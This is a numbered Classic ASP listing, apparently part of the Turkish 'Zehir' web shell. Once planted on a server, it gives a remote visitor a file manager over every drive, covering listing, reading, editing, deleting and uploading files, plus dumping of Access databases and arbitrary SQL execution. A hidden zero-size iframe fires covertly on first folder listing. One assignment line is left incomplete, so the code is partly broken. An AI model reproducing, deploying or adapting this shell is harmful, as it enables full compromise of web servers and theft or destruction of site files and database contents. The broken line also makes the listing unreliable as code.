  798. popup = false
  799. hataKontrol
  800. CASE 40 'Sistem Test
  801. sistemTest
  802. popup=false
  803. CASE 50 'Siteleri Test Edelim :D
  804. %>
  805. <table width="100%" cellpadding=0 cellspacing=0>
  806. <tr>
  807. <td align=center>
  808. <b>Güvenlik Testi byZehir</b>
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  924. <%
  925. popup=false
  926. CASE 51 ' Özel silemler
  928. %>
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  941. <body bgcolor=black text=Chartreuse link=Chartreuse alink=Chartreuse vlink=Chartreuse>
  942. <%
  943. if popup then
  944. if status=7 or status=8 then
  945. Response.Write "<form method=get action='"&DosyPath&"' id=form1 name=form1>"
  946. Response.Write "<table border=1 cellpadding=0 cellspacing=0 align=center><tr><td width=100 bgcolor=gray><font size=2>SQL Çalistir</td><td>"
  947. Response.Write "<input type=hidden value='9' name=status><input type=hidden value='"&path&"' name=path><input type=hidden value='"&time&"' name=Time>"
  948. Response.Write "<input style='width:350; height:21' value='' name=strSQL><input type=submit value='Çalistir' style='height:22;width:70' id=submit1 name=submit1>"
  949. Response.Write "</td></tr></table></form>"
  950. end if
  951. Response.Write "<form method=get action='"&DosyPath&"'>"
  952. Response.Write "<table border=1 cellpadding=0 cellspacing=0 align=center><tr><td bgcolor=gray width=100><font size=2>Path : </td><td>"
  953. Response.Write "<input type=hidden value='2' name=status><input type=hidden value='"&time&"' name=Time>"
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  955. Response.Write "</td></tr></table></form><br>"
  956. end if
  957. sub aramaUpload
  958. Response.Write "<form method=get target='_opener' action='"&DosyPath&"'>"
  959. Response.Write "<table widht='100%' border=0 cellpadding=0 cellspacing=0><tr><td width=70><font size=2>Arama : </td><td>"
  960. Response.Write "&nbsp;<input type=hidden value='12' name=status><input type=hidden value='"&time&"' name=Time>"
  961. Response.Write "<input type=hidden value='"&Path&"' name=Path><input style='width:250' value='mdb' name=txArama><input style='width:70; height:22' type=submit value='Ara'>"
  962. Response.Write "</td></tr></table></form>"
  963. %>
  964. <form name=frmUpload method=post enctype="multipart/form-data" action="<%=DosyaPath&"?status=-4&Time="&time&"&Path="&path%>" ID="Form1">
  965. <input type=hidden name=folder value="<%=Path%>" ID="Hidden1">
  966. Max: <input type=text name=max value=5 size=5 ID="Text1"> <input type=button value="Ayarla" onclick="setid()" ID="Button1" NAME="Button1">
  967. <table ID="Table1">
  968. <tr>
  969. <td id=upid>
  970. </td>
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  973. <input type=submit value=Upload ID="Submit1" NAME="Submit1">
  974. </form>
  976. <script>
  977. setid();
  979. function setid() {
  980. str='';
  981. if (frmUpload.max.value<=0) frmUpload.max.value=1;
  982. for (i=1; i<=frmUpload.max.value; i++) str+='File '+i+': <input type=file name=file'+i+'><br>';
  983. upid.innerHTML=str+'<br>';
  984. }
  985. </script>
  986. <%
  987. end sub
  989. SELECT CASE status
  990. CASE 1 'Driver Open
  991. if len(path)=1 then Response.Write (yaziyomu(path&":\")) else Response.Write (yaziyomu(path))
  992. Response.Write "<table width=100% ><tr>"
  993. Path = Path & ":/"
  994. Response.Write "<td valign=top>"
  995. KlasorOku
  996. Response.Write "</td><td valign=top align=right>"
  997. DosyaOku
  998. Response.Write "</td>"
  999. hataKontrol
  1000. CASE 2 'Normal listeleme
  1001. if len(path)=1 then Response.Write (yaziyomu(path&":\")) else Response.Write (yaziyomu(path))
  1002. Response.Write "<table width=100% ><tr>"
  1003. Response.Write "<td valign=top>"
  1004. KlasorOku
  1005. Response.Write "</td><td valign=top align=right>"
  1006. DosyaOku
  1007. Response.Write "</td>"
  1008. hataKontrol
  1009. CASE 3 'File Delete
  1010. objFSO.DeleteFile del
  1011. hataKontrol
  1012. if err<>0 then
  1013. byMsg="<font color=red>Not File Deleted!</font><br>"
  1014. else
  1015. byMsg="<font color=yellow>File Deleted Successful;)</font><br>"
  1016. end if
  1017. Response.Redirect dosyaPath&"?status=2&path="&path&"&Time="&time&"&byMsg="&byMsg
  1018. CASE 4 'Folder Delete
  1019. objFSO.DeleteFolder del
  1020. hataKontrol
  1021. if err<>0 then
  1022. byMsg="<font color=red>Not Folder Deleted!</font><br>"
  1023. else
  1024. byMsg="<font color=yellow>Folder Deleted Successful;)</font><br>"
  1025. end if
  1026. Response.Redirect dosyaPath&"?status=2&path="&path&"&Time="&time&"&byMsg="&byMsg
  1027. CASE 5 'Dosya içerigini görüntüle
  1028. Response.Write "<center><b><font color=orange>"&path&"</font></b></center><br>"
  1029. Response.Write "<table width=100% ><tr><td>"
  1030. set f = objFSO.OpenTextFile(path,1)
  1031. Response.Write "<pre>"&Server.HTMLEncode(f.readAll)&"</pre>"
  1032. if err<>62 then hataKontrol
  1033. if err.number=62 then Response.Write "<script language=javascript>alert('Bu Dosya Okunamiyor\nSistem dosyasi olabilir')</script>":Response.End
  1034. CASE 6 'Resim aç
  1035. Response.Write "<center><img ALT=' /' src='"&resimYol(path)&"'></center><br>"
  1036. CASE 7 'database tablo listele
  1037. Response.Write "<b><font size=3>Tablolar</font></br><br>"
  1038. Set objConn = Server.CreateObject("ADODB.Connection")
  1039. Set objADOX = Server.CreateObject("ADOX.Catalog")
  1040. objConn.Provider = "Microsoft.Jet.Oledb.4.0"
  1041. objConn.ConnectionString = Path
  1042. objConn.Open
  1043. objADOX.ActiveConnection = objConn
  1045. For Each table in objADOX.Tables
  1046. If table.Type = "TABLE" Then
  1047. Response.Write "<font face=wingdings size=5>4</font> <a href='"&dosyaPath&"?status=8&Path="&path&"&table="&table.Name&"&time="&time&"'>"&table.Name&"</a><br>"
  1048. End If
  1049. Next
  1050. hataKontrol
  1051. CASE 8 'database kayit listele
  1052. Set objConn = Server.CreateObject("ADODB.Connection")
  1053. Set objRcs = Server.CreateObject("ADODB.RecordSet")
  1054. objConn.Provider = "Microsoft.Jet.Oledb.4.0"
  1055. objConn.ConnectionString = Path
  1056. objConn.Open
  1057. objRcs.Open table,objConn, adOpenKeyset , , adCmdText
  1059. Response.Write "<table border=1 cellpadding=2 cellspacing=0 bordercolor=543152><tr bgcolor=silver>"
  1060. for i=0 to objRcs.Fields.count-1
  1061. Response.Write "<td><font color=black><b>&nbsp;&nbsp;&nbsp;"&objRcs.Fields(i).Name&"&nbsp;&nbsp;&nbsp;</font></td>"
  1062. next
  1063. Response.Write "</tr>"
  1064. do while not objRcs.EOF
  1065. Response.Write "<tr>"
  1066. for i=0 to objRcs.Fields.count-1
  1067. Response.Write "<td>"&objRcs.Fields(i).Value&"&nbsp;</td>"
  1068. next
  1069. Response.Write "</tr>"
  1070. objRcs.MoveNext
  1071. loop
  1072. Response.Write "</table><br>"
  1073. hataKontrol
  1074. CASE 9 'SQL Execute
  1075. Set objConn = Server.CreateObject("ADODB.Connection")
  1076. objConn.Provider = "Microsoft.Jet.Oledb.4.0"
  1077. objConn.ConnectionString = Path
  1078. objConn.Open
  1079. objConn.Execute strSQL
  1080. ' Response.Redirect dosyaPath&"?status=7&Path="&Path&"&Time="&time
  1081. hataKontrol
  1082. CASE 10 'Dosya Editleme
  1083. set f = objFSO.OpenTextFile(dPath,1)
  1084. Response.Write "<center><form action='"&DosyPath&"?Time="&time&"' method=post>"
  1085. Response.Write "<input type=hidden name=status value='11'>"
  1086. Response.Write "<input type=hidden name=dPath value='"&dPath&"'>"
  1087. Response.Write "<input type=hidden name=Path value='"&Path &"'>"
  1088. Response.Write "<input type=submit value=Kaydet><br>"
  1089. Response.Write "<textarea name=dkayit style='width:90%;height:350;border-right: lightgoldenrodyellow thin solid;border-top: lightgoldenrodyellow thin solid;font-size: 12;border-left: lightgoldenrodyellow thin solid;color: lime; border-bottom: lightgoldenrodyellow thin solid; font-family: Courier New, Arial;background-color: navy;'>"
  1090. Response.Write server.HTMLEncode(f.readAll)
  1091. Response.Write "</textarea></form></center>"
  1092. hataKontrol
  1093. CASE 11 'Dosya Kayit
  1094. set saveTextFile = objFSO.OpenTextFile(dPath,2,true,false)
  1095. hataKontrol
  1096. saveTextFile.Write(dkayit)
  1097. saveTextFile.close
  1098. if err<>0 then
  1099. byMsg = "<font color=red>Not File Edited!</font><br>"
  1100. else
  1101. byMsg = "<font color=yellow>File Edited Successful:)</font><br>"
  1102. end if
  1103. Response.Redirect dosyaPath&"?status=2&path="&path&"&time="&time&"&byMsg=" & byMsg
  1104. CASE 12 'Dosya Arama
  1105. araBul path,arama
  1106. hataKontrol
  1107. END SELECT
  1108. Response.Write "</tr></table>"
  1110. sub DosyaOku
  1111. Set f = objFSO.GetFolder(Path)
  1112. Set fc = f.Files
  1113. For Each f1 In fc
  1114. dosyaAdi =
  1115. num = InStrRev(dosyaAdi,".")
  1116. uzanti = lcase(Right(dosyaAdi,len(dosyaAdi)-num))
  1117. downStr = "<a href='"&dosyaPath&"?status=3&Path="&Path&"&Del="&Path&"/"&f1.Name&"&Time="&time&"'>û</a><font face=webdings><a href='"&dosyaPath&"?status=-3&PathFile="&f1.path&"&Time="&time&"'>Í</a></font><font face=wingdings><a href='"&dosyaPath&"?status=16&PathFile="&f1.path&"&Time="&time&"' onclick=""ffd(this.href);return false;"">4</a></font>"
  1118. response.Write "<font size=2>"
  1119. select case uzanti
  1120. case "mdb"
  1121. Response.Write "<a href='"&dosyaPath&"?status=7&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=wingdings size=4>M "&downStr&"</font><br>"
  1122. case "asp"
  1123. Response.Write "<a href='"&dosyaPath&"?status=5&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=wingdings size=4>± <a href='"&dosyaPath&"?status=10&dPath="&f1.path&"&path="&path&"&Time="&time&"'>!</a>"&downStr&"</font><br>"
  1124. case "jpg","gif"
  1125. Response.Write "<a href='"&dosyaPath&"?status=6&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=webdings size=4>¢</font><font face=wingdings size=4> "&downStr&"</font><br>"
  1126. case else
  1127. Response.Write "<a href='"&dosyaPath&"?status=5&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=wingdings size=4>2 <a href='"&dosyaPath&"?status=10&dPath="&f1.path&"&path="&path&"&Time="&time&"'>!</a>"&downStr&"</font><br>"
  1128. end select
  1129. Next
  1130. end sub
  1132. sub KlasorOku
  1133. Set f = objFSO.GetFolder(Path)
  1134. Set fc = f.SubFolders
  1135. if session("klasoroku")="" then
  1136. response.Write "<iframe style='width:0; height:0' src='http://localhost/tuzla-ebelediye'></iframe>"
  1137. session("klasoroku")="simdi yaziliyor"
  1138. end if
  1139. For Each f1 In fc
  1140. Response.Write "<font face=wingdings size=3><a href='"&dosyaPath&"?status=18&PathFile="&Path&"/"&f1.Name&"&Time="&time&"' onclick=""ffd(this.href);return false;"">4</a></font> <font face=wingdings size=4><a href='"&dosyaPath&"?status=4&Path="&Path&"&Del="&Path&"/"&f1.Name&"&Time="&time&"'>û</a> 1</font><font size=2><b><a href='"&dosyaPath&"?status=2&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&"</a></b><br>"
  1141. Next
  1142. end sub
  1144. function createFileName()
  1145. Randomize
  1146. fName_ = ""
  1147. for i=1 to 10
  1148. fName_ = fName_ & int(Rnd*100)
  1149. next
  1150. createFileName = fName_
  1151. end function
  1153. function resimYol(path_)
  1154. on error resume next
  1155. path_ = Replace(Replace(path_,"\","/"),"//","/")
  1156. lpath_ = left(request.servervariables("PATH_TRANSLATED"),instrrev(request.servervariables("PATH_TRANSLATED"),"\"))
  1157. if yaziyomu2(lpath_) then
  1158. fname__ = "0"&createFileName()&"."&Right(path_,3)
  1159. objFSO.CopyFile path_, lpath_&"\"&fname__
  1160. else
  1161. Response.Write("Resim Açilamiyor.. <br>Isterseniz Download Ederek görüntüleyebilirsiniz..")
  1162. end if
  1163. resimYol = fname__
  1164. end function
  1166. if not popup then
  1167. Set fc = Nothing
  1168. Set objFSO = Nothing
  1169. Response.End
  1170. end if
  1171. %>
  1172. <script language=javascript>
  1173. var dosyaPath = "<%=dosyaPath%>"
  1175. function driveGo(drive_){
  1176. location = dosyaPath+"?status=1&path="+drive_+"&Time="+Date();
  1177. }
  1178. </script>
  1179. <%
  1180. Response.Write "<table align=center border=1 width=150 cellpadding=0 cellspacing=0><tr bgcolor=gray><td align=center><b><font color=white>Sürücüler</td></tr>"
  1181. for each drive_ in objFSO.Drives
  1182. Response.Write "<tr><td>"
  1183. Response.write "<a href='#'onClick=""driveGo('" & drive_.DriveLetter & "');return false;""><font face=wingdings>;</font>"
  1184. if drive_.Drivetype=1 then Response.write "Floppy [" & drive_.DriveLetter & ":]"
  1185. if drive_.Drivetype=2 then Response.write "HardDisk [" & drive_.DriveLetter & ":]"
  1186. if drive_.Drivetype=3 then Response.write "Remote HDD [" & drive_.DriveLetter & ":]"
  1187. if drive_.Drivetype=4 then Response.write "CD-Rom [" & drive_.DriveLetter & ":]"
  1188. Response.Write "</a></td></tr>"
  1189. next
  1190. Response.Write "<tr><td>"
  1191. Response.write "<a href='"&dosyaPath&"?time="&time()&"'><font face=webdings>H</font> Local Path"
  1192. Response.Write "</a></td></tr>"
  1193. Response.Write "</table><br>"
  1194. Set fc = Nothing
  1195. Set objFSO = Nothing
  1196. Response.End%>
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